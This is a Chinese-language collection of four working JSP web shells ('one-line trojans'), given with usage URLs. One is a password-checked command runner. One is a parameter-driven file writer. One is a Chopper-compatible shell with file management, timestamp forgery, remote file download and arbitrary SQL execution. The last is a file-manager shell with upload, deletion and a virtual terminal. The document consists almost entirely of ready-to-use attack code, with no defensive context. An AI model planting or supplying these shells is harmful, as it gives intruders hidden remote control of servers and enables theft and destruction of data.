一句话木马:JSP篇

 

JSP一句话收集:

 

1、带密码的回显cmd马

<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>

请求:http://x.x.x.x/cmd.jsp??pwd=023&i=whoami

 

2、一句话

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

在浏览器地址栏输入http://192.168.125.138:8080/222.jsp?f=1.txt&t=hello123123

然后再输入http://127.0.0.1:8080/test/1.txt

 

3、jsp一句话,菜刀可直连

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "pass";

    String EC(String s, String c) throws Exception {
        return s;
    }//new String(s.getBytes("ISO-8859-1"),c);}

    Connection GC(String s) throws Exception {
        String[] x = s.trim().split("\r\n");
        Class.forName(x[0].trim()).newInstance();
        Connection c = DriverManager.getConnection(x[1].trim());
        if (x.length > 2) {
            c.setCatalog(x[2].trim());
        }
        return c;
    }

    void AA(StringBuffer sb) throws Exception {
        File r[] = File.listRoots();
        for (int i = 0; i < r.length; i++) {
            sb.append(r[i].toString().substring(0, 2));
        }
    }

    void BB(String s, StringBuffer sb) throws Exception {
        File oF = new File(s), l[] = oF.listFiles();
        String sT, sQ, sF = "";
        java.util.Date dt;
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        for (int i = 0; i < l.length; i++) {
            dt = new java.util.Date(l[i].lastModified());
            sT = fm.format(dt);
            sQ = l[i].canRead() ? "R" : "";
            sQ += l[i].canWrite() ? " W" : "";
            if (l[i].isDirectory()) {
                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
                        + "\t" + sQ + "\n");
            } else {
                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
                        + sQ + "\n";
            }
        }
        sb.append(sF);
    }

    void EE(String s) throws Exception {
        File f = new File(s);
        if (f.isDirectory()) {
            File x[] = f.listFiles();
            for (int k = 0; k < x.length; k++) {
                if (!x[k].delete()) {
                    EE(x[k].getPath());
                }
            }
        }
        f.delete();
    }

    void FF(String s, HttpServletResponse r) throws Exception {
        int n;
        byte[] b = new byte[512];
        r.reset();
        ServletOutputStream os = r.getOutputStream();
        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
        os.write(("->" + "|").getBytes(), 0, 3);
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.write(("|" + "<-").getBytes(), 0, 3);
        os.close();
        is.close();
    }

    void GG(String s, String d) throws Exception {
        String h = "0123456789ABCDEF";
        int n;
        File f = new File(s);
        f.createNewFile();
        FileOutputStream os = new FileOutputStream(f);
        for (int i = 0; i < d.length(); i += 2) {
            os
                    .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
                            .charAt(i + 1))));
        }
        os.close();
    }

    void HH(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        if (sf.isDirectory()) {
            if (!df.exists()) {
                df.mkdir();
            }
            File z[] = sf.listFiles();
            for (int j = 0; j < z.length; j++) {
                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
            }
        } else {
            FileInputStream is = new FileInputStream(sf);
            FileOutputStream os = new FileOutputStream(df);
            int n;
            byte[] b = new byte[512];
            while ((n = is.read(b, 0, 512)) != -1) {
                os.write(b, 0, n);
            }
            is.close();
            os.close();
        }
    }

    void II(String s, String d) throws Exception {
        File sf = new File(s), df = new File(d);
        sf.renameTo(df);
    }

    void JJ(String s) throws Exception {
        File f = new File(s);
        f.mkdir();
    }

    void KK(String s, String t) throws Exception {
        File f = new File(s);
        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
        java.util.Date dt = fm.parse(t);
        f.setLastModified(dt.getTime());
    }

    void LL(String s, String d) throws Exception {
        URL u = new URL(s);
        int n;
        FileOutputStream os = new FileOutputStream(d);
        HttpURLConnection h = (HttpURLConnection) u.openConnection();
        InputStream is = h.getInputStream();
        byte[] b = new byte[512];
        while ((n = is.read(b, 0, 512)) != -1) {
            os.write(b, 0, n);
        }
        os.close();
        is.close();
        h.disconnect();
    }

    void MM(InputStream is, StringBuffer sb) throws Exception {
        String l;
        BufferedReader br = new BufferedReader(new InputStreamReader(is));
        while ((l = br.readLine()) != null) {
            sb.append(l + "\r\n");
        }
    }

    void NN(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        ResultSet r = c.getMetaData().getCatalogs();
        while (r.next()) {
            sb.append(r.getString(1) + "\t");
        }
        r.close();
        c.close();
    }

    void OO(String s, StringBuffer sb) throws Exception {
        Connection c = GC(s);
        String[] t = { "TABLE" };
        ResultSet r = c.getMetaData().getTables(null, null, "%", t);
        while (r.next()) {
            sb.append(r.getString("TABLE_NAME") + "\t");
        }
        r.close();
        c.close();
    }

    void PP(String s, StringBuffer sb) throws Exception {
        String[] x = s.trim().split("\r\n");
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1007);
        ResultSet r = m.executeQuery("select * from " + x[3]);
        ResultSetMetaData d = r.getMetaData();
        for (int i = 1; i <= d.getColumnCount(); i++) {
            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
                    + ")\t");
        }
        r.close();
        m.close();
        c.close();
    }

    void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
        int i;
        Connection c = GC(s);
        Statement m = c.createStatement(1005, 1008);
        try {
            ResultSet r = m.executeQuery(q);
            ResultSetMetaData d = r.getMetaData();
            int n = d.getColumnCount();
            for (i = 1; i <= n; i++) {
                sb.append(d.getColumnName(i) + "\t|\t");
            }
            sb.append("\r\n");
            while (r.next()) {
                for (i = 1; i <= n; i++) {
                    sb.append(EC(r.getString(i), cs) + "\t|\t");
                }
                sb.append("\r\n");
            }
            r.close();
        } catch (Exception e) {
            sb.append("Result\t|\t\r\n");
            try {
                m.executeUpdate(q);
                sb.append("Execute Successfully!\t|\t\r\n");
            } catch (Exception ee) {
                sb.append(ee.toString() + "\t|\t\r\n");
            }
        }
        m.close();
        c.close();
    }%>
     
     
<%
    String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
    request.setCharacterEncoding(cs);
    response.setContentType("text/html;charset=" + cs);
    String Z = EC(request.getParameter(Pwd) + "", cs);
    String z1 = EC(request.getParameter("z1") + "", cs);
    String z2 = EC(request.getParameter("z2") + "", cs);
    StringBuffer sb = new StringBuffer("");
    try {
        sb.append("->" + "|");
        if (Z.equals("A")) {
            String s = new File(application.getRealPath(request
                    .getRequestURI())).getParent();
            sb.append(s + "\t");
            if (!s.substring(0, 1).equals("/")) {
                AA(sb);
            }
        } else if (Z.equals("B")) {
            BB(z1, sb);
        } else if (Z.equals("C")) {
            String l = "";
            BufferedReader br = new BufferedReader(
                    new InputStreamReader(new FileInputStream(new File(
                            z1))));
            while ((l = br.readLine()) != null) {
                sb.append(l + "\r\n");
            }
            br.close();
        } else if (Z.equals("D")) {
            BufferedWriter bw = new BufferedWriter(
                    new OutputStreamWriter(new FileOutputStream(
                            new File(z1))));
            bw.write(z2);
            bw.close();
            sb.append("1");
        } else if (Z.equals("E")) {
            EE(z1);
            sb.append("1");
        } else if (Z.equals("F")) {
            FF(z1, response);
        } else if (Z.equals("G")) {
            GG(z1, z2);
            sb.append("1");
        } else if (Z.equals("H")) {
            HH(z1, z2);
            sb.append("1");
        } else if (Z.equals("I")) {
            II(z1, z2);
            sb.append("1");
        } else if (Z.equals("J")) {
            JJ(z1);
            sb.append("1");
        } else if (Z.equals("K")) {
            KK(z1, z2);
            sb.append("1");
        } else if (Z.equals("L")) {
            LL(z1, z2);
            sb.append("1");
        } else if (Z.equals("M")) {
            String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
            Process p = Runtime.getRuntime().exec(c);
            MM(p.getInputStream(), sb);
            MM(p.getErrorStream(), sb);
        } else if (Z.equals("N")) {
            NN(z1, sb);
        } else if (Z.equals("O")) {
            OO(z1, sb);
        } else if (Z.equals("P")) {
            PP(z1, sb);
        } else if (Z.equals("Q")) {
            QQ(cs, z1, z2, sb);
        }
    } catch (Exception e) {
        sb.append("ERROR" + ":// " + e.toString());
    }
    sb.append("|" + "<-");
    out.print(sb.toString());
%>

 

 

 

4、小马,上传

?p=ruphy&f=

<%@page import="java.io.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.zip.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.util.*" contentType="text/html; charset=UTF-8" %>
<%@page import="java.lang.StringBuilder" contentType="text/html; charset=UTF-8" %>
<%@page import="java.net.URLDecoder" contentType="text/html; charset=UTF-8" %>
<%!
    void recursionZip(ZipOutputStream zipOut, File file, String baseDir) throws Exception {
        if (file.isDirectory()) {
            File[] files = file.listFiles();
            for (File fileSec : files) {
                recursionZip(zipOut, fileSec, baseDir + file.getName() + File.separator);
            }
        } else {
            byte[] buf = new byte[1024];
            InputStream input = new FileInputStream(file);
            zipOut.putNextEntry(new ZipEntry(baseDir + file.getName()));
            System.out.println(file + "压缩成功!");
            int len;
            while ((len = input.read(buf)) != -1) {
                zipOut.write(buf, 0, len);
            }
            input.close();
        }
    }
    boolean zip(String filepath, String zipPath) {
        try {
            File file = new File(filepath);// 要被压缩的文件夹
            File zipFile = new File(zipPath);
            ZipOutputStream zipOut = new ZipOutputStream(new FileOutputStream(zipFile));
            if (file.isDirectory()) {
                File[] files = file.listFiles();
                for (File fileSec : files) {
                    if (!fileSec.getAbsolutePath().equals(zipFile.getAbsolutePath()))
                        recursionZip(zipOut, fileSec, file.getName() + File.separator);
                }
            } else {
                recursionZip(zipOut, file, "");
            }
            zipOut.close();
        } catch (Exception e) {
            return false;
        }
        return true;
    }
    void copyStream(final InputStream[] ins, final JspWriter out) {
        for (final InputStream in : ins) {
            new Thread(new Runnable() {
                // @Override  不兼容低版本
                public void run() {
                    if (in == null) return;
                    try {
                        int a = -1;
                        byte[] b = new byte[2048];
                        while ((a = in.read(b)) != -1) {
                            out.println(new String(b));
                        }
                    } catch (Exception e) {
                    } finally {
                        try {
                            if (in != null) in.close();
                        } catch (Exception ec) {
                        }
                    }
                }
            }).start();
        }
    }
    String uploadFile(DataInputStream is, String path, int size, String sp) throws IOException {
        if (size > 20 * 1024 * 1024) {
            return "上传失败,文件太大!";
        }
        byte bts[] = new byte[size];
        int br = 0;
        int tbr = 0;
        //上传的数据保存在byte数组里面
        while (tbr < size) {
            br = is.read(bts, tbr, size);
            tbr += br;
        }
        String file = new String(bts, "utf-8");
        String sf = file.substring(file.indexOf("filename=\"") + 10);
        sf = sf.substring(0, sf.indexOf("\n")).replaceAll("/\\+", "/");
        sf = sf.substring(sf.lastIndexOf("/") + 1, sf.indexOf("\""));
        String fileName = path + "/" + sf;
        int pos;
        pos = file.indexOf("filename = \"");
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        pos = file.indexOf("\n", pos) + 1;
        int bl = file.indexOf(sp, pos) - 4;
        //取得文件数据的开始的位置
        int startPos = ((file.substring(0, pos)).getBytes()).length;
        int endPos = ((file.substring(0, bl)).getBytes()).length;
        File checkFile = new File(fileName);
        if (checkFile.exists()) {
            checkFile.delete();
        }
        FileOutputStream fileOut = new FileOutputStream(fileName);
        fileOut.write(bts, startPos, (endPos - startPos));
        fileOut.close();
        return sf + "文件上传成功!";
    }
    String getCurrentPath(String file, String p, String url) throws IOException {
        String path = "";
        String tmpFile = file.replaceAll("/[^/]+/?$", "/");
        while (!file.equals(tmpFile)) {
            path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file.replaceAll(tmpFile, "") + "</a>" + path;
            file = tmpFile;
            tmpFile = file.replaceAll("/[^/]+/?$", "/");
        }
        path = "<a href='" + url + "?p=" + p + "&f=" + file + "'>" + file + "</a>" + path;
        return path;
    }
%>

<%
    //验证用户名
    String dp = "ruphy";
    response.setCharacterEncoding("UTF-8");
    String url = request.getRequestURL().toString();
    String p = request.getParameter("p");
    if (!dp.equals(p)) {
        if (!"true".equals(request.getParameter("c"))) {
            out.println("<div style='text-align: center;'>访问失败!<span style='color: red'>密码错误!</span></div>");
            out.println("<div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "?p=passwd&f=path' >" + url + "?p=passwd&f=path</a></span></div>");
            out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div>");
        }
        return;
    }
    String m = request.getParameter("m");
    if (m != null && !"".equals(m.trim())) {
        out.println("开始执行命令: " + m);
        out.flush();
        String[] cmds = new String[]{"sh", "-c", m};
        if (System.getProperty("os.name").toLowerCase().contains("windows")) {
            cmds = new String[]{"cmd", "/k", m};
        }
        Process ps = null;
        out.print("<xmp>");
        try {
            ps = Runtime.getRuntime().exec(cmds);
            copyStream(new InputStream[]{ps.getInputStream(), ps.getErrorStream()}, out);
            ps.getOutputStream().close();
            ps.waitFor();
        } catch (Exception e) {
            out.println("<div>执行命令 " + m + " 发生错误!</div>");
        } finally {
            try {
                if (ps != null) ps.destroy();
            } catch (Exception ec) {
                out.println("关闭流出错!");
            }
        }
        out.println("</xmp>");
        out.println("<div>执行命令: " + m + " 完成!</div>");
        return;
    }
    String fn = request.getParameter("f");
    if (fn == null || "".equals(fn.trim())) {
        fn = application.getRealPath("/");
    }
    String f = fn.replaceAll("\\\\+", "/").replaceAll("/+", "/");
    String ct = request.getContentType();
    if (ct != null && ct.indexOf("multipart/form-data") >= 0) {
        DataInputStream is = new DataInputStream(request.getInputStream());
        String msg = uploadFile(is, f, request.getContentLength(), ct.substring(ct.lastIndexOf("=") + 1, ct.length()));
        out.println("<script>alert('" + msg + "');location.href='" + url + "?p=" + dp + "&f=" + f + "';</script>");
        return;
    }
    File file = new File(f);
    if (!file.exists()) {
        out.println("<script>alert('输入目录或者文件不存在!')</script>");
    }
    if ("true".equals(request.getParameter("t")) && file.exists()) {
        if (zip(f, new File(f).getAbsolutePath() + ".zip")) {
            out.println("<script>alert('压缩成功!');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        }
        out.println("<script>alert('压缩失败');location.href=location.href.replace(\"&t=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        return;
    }
    if (file.isDirectory() && file.canRead()) {
        StringBuilder sb = new StringBuilder();
        File[] files = File.listRoots();
        String roots = "";
        for (int i = 0; i < files.length; i++) {
            roots += "<a style=\"margin-left: 10px;\" href=\"" + url + "?p=" + dp + "&f=" + files[i].getPath().replaceAll("\\\\+", "/") + "/\">" + files[i].getPath() + "</a>";
        }
        sb.append("<div><div>");
        sb.append("<div style='margin: 10px 0 0 20px'><form action=" + url + "?p=" + dp + "&f=" + f + " method='post' enctype='multipart/form-data'>文件上传: <input name='fileName' type='file'><input onclick='return confirm(\"上传到当前目录:" + f + "?\")' value='上传' type='submit'></form>");
        sb.append("</div><div style='margin: 5px 0 20px 20px'><span>根目录:" + roots + "</span><span style=\"margin-left: 20px;\">当前目录:" + getCurrentPath(f, dp, url) + "</span>"
                + "<span style=\"margin-left: 20px;\" ><a href=\"" + url + "?p=" + dp + "&f=" + f.replaceAll("/[^/]+/?$", "/") + "\">返回上级目录</a></span>"
                + "</div>");
        sb.append("<div style='max-height: 400px; overflow: auto; background-color: #ffe;'><table><tbody>");
        files = file.listFiles();
        for (int i = 0; i < files.length; i++) {
            if (files[i].canRead()) {
                sb.append("<tr>"
                        + "<td><a style=\"margin-left: 20px;\" href='" + url + "?p=" + dp + "&f=" + f + "/" + files[i].getName() + "'>" + files[i].getName() + "</a></td>"
                        + "<td><a style=\"margin-left: 20px;\" onclick='return confirm(\"确定删除吗?\")' href=\"" + url + "?p=" + dp + "&r=true&f=" + f + "/" + files[i].getName() + "\">删除</a></td>"
                        + (!files[i].isFile() ? "<td></td>" : "<td><a style=\"margin-left: 20px;\" onclick=\"top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&v=true&w=true&f=" + f + "/" + files[i].getName() + "');\" href=\"#\">查看</a></td>")
                        + "<td><a style=\"margin-left: 20px;\" href=\"" + url + "?p=" + dp + "&t=true&f=" + f + "/" + files[i].getName() + "\">压缩</a>"
                        + "<span style=\"margin-left: 20px\">" + files[i].length() / 1024 + "KB(" + files[i].length() / 1024 / 1024 + "MB)</span></td>"
                        + "</tr>");
            }
        }
        sb.append("</tbody></table></div></div>");
        sb.append("<div style='background-color: #ccc;'>");
        sb.append("<div style='margin: 20px'>虚拟终端:<input id='command' type='text' value='netstat -an' style='width: 250px;border: none;color: red;background-color: black;'/>"
                + "<a style='color: blue' onclick=\"var m= top.document.getElementById('command').value;if(!m) return false; top.document.getElementById('view-file').setAttribute('src', '" + url + "?p=ruphy&m=' + encodeURIComponent(m));\" href=\"#\">执行</a>"
                + "</div>");
        sb.append("<div style='margin-top: 20px; padding: 5px; height: 600px;max-height: 100%'>"
                + "<iframe id='view-file' src='" + url + "?c=true' height='100%' style='width: 100%; height: 100%' frameborder='0'></iframe>"
                + "</div>");
        sb.append("</div>");
        out.println(sb.toString());
        out.println("<div><div style='text-align: center;'><span>usage: <a style='color: black' href='" + url + "' >" + url + "?p=passwd</a></span></div>");
        out.println("<div style='text-align: center; color: blue'>@copyright by ruphy.</div></div>");
        sb.append("</div>");
        return;
    }
    if ("true".equals(request.getParameter("r"))) {
        if (file.delete()) {
            out.println("<script>alert('删除成功!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        }
        out.println("<script>alert('删除失败!');location.href=location.href.replace(\"&r=true\", \"\").replace(/\\/[^\\/]+$/, '');</script>");
        return;
    }
    if (!"true".equals(request.getParameter("v"))) {
        response.setContentType("application/octet-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + f.replaceAll(".+/+", "").replace(" ", "_"));
    } else if (file.length() > 1024 * 1024 * 10) {
        out.println("文件太大,请下载查看!");
        return;
    }
    String ctt = java.nio.file.Files.probeContentType(file.toPath());
    ctt = ctt == null ? "others" : ctt.replaceAll("\\/+.*", "");
    if ("true".equals(request.getParameter("w"))) {
        String u = url + "?p=ruphy&v=true&l=true&f=" + f;
        if ("video".equals(ctt)) {
            out.println("<div style='width: 800px'><video style='margin-top: 5px; width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
            return;
        }
        if ("audio".equals(ctt)) {
            out.println("<div style='width: 300px'><audio style='width: 100%' controls=\"controls\" autoplay=\"autoplay\" src='" + u + "' /></div>");
            return;
        }
        if ("image".equals(ctt)) {
            out.println("<div style='width: 600px'><img style='margin-top: 5px; width:100%;' alt='非图片' src='" + u + "'/></div>");
            return;
        }
    }
    if ("true".equals(request.getParameter("l"))) {
        OutputStream streamOut = response.getOutputStream();
        InputStream streamIn = new FileInputStream(file);
        int length = streamIn.available();
        int bytesRead = 0;
        byte[] buffer = new byte[1024];
        while ((bytesRead = streamIn.read(buffer, 0, 1024)) != -1) {
            streamOut.write(buffer, 0, bytesRead);
        }
        response.flushBuffer();
        streamIn.close();
        streamOut.close();
        return;
    }
    FileInputStream fis = new FileInputStream(file);
    InputStreamReader isr = new InputStreamReader(fis, "UTF-8");
    BufferedReader br = new BufferedReader(isr);
    StringBuilder sb = new StringBuilder();
    sb.append("<xmp>\n");
    String line = null;
    while ((line = br.readLine()) != null) {
        sb.append(line);
        sb.append("\n");
    }
    sb.append("</xmp>");
    out.println(sb.toString());
    fis.close();
    isr.close();
    br.close();
%>

 
